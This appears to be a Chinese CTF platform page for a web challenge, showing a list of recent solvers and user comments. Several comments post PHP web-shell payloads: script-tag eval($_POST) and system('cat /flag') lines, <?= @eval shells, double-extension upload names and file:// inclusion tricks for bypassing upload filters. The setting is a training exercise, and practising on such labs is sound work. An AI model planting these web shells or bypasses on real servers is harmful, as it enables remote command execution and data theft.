评分(5)
解题动态
Alune 攻破了该题 16小时前
lzhh530393027 攻破了该题 1天前
wyjzzzz 攻破了该题 1天前
辛笙 攻破了该题 2天前
18394165790 攻破了该题 3天前
yzs15202361526 攻破了该题 4天前
spencerwillant 攻破了该题 4天前
Gxkap0k 攻破了该题 5天前
魔域魔域 攻破了该题 5天前
ch021 攻破了该题 5天前
2741561103 攻破了该题 7天前
xxaqgcszzh 攻破了该题 7天前
blueboat 攻破了该题 8天前
18176492720 攻破了该题 8天前
bugku1636 攻破了该题 8天前
菜薯为什么 攻破了该题 8天前
1993267 攻破了该题 9天前
1002732142 攻破了该题 10天前
PureStream 攻破了该题 10天前
评论
caicai0728 19天前
举报
解题参考,超详细:https://blog.csdn.net/cai_huaer/article/details/153740286?spm=1001.2014.3001.5501
15105219317 1月前
举报
文件上传成功了,蚁剑也显示连接成功,为啥没数据返回啊
lin666 1月前
举报
文件包含 + 文件上传 (使用非主流的内容写法来绕过常规的内容头替换 <script language="php">system("ls");</script> )
2686213396 3月前
举报
http://117.72.52.127:18030/index.php?file=file:///flag,file伪协议说是
satuo 3月前
举报
<script language=php>echo 'a'; eval($_POST['pass']);</script>
zhuizhui 4月前
举报
<script language=php>system("cat /flag")</script> webshell.php;.png
leonleonleon 5月前
举报
1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag
shingu 7月前
举报
file=/flag,怎么会这么简单?
volnu1l 9月前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 11月前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。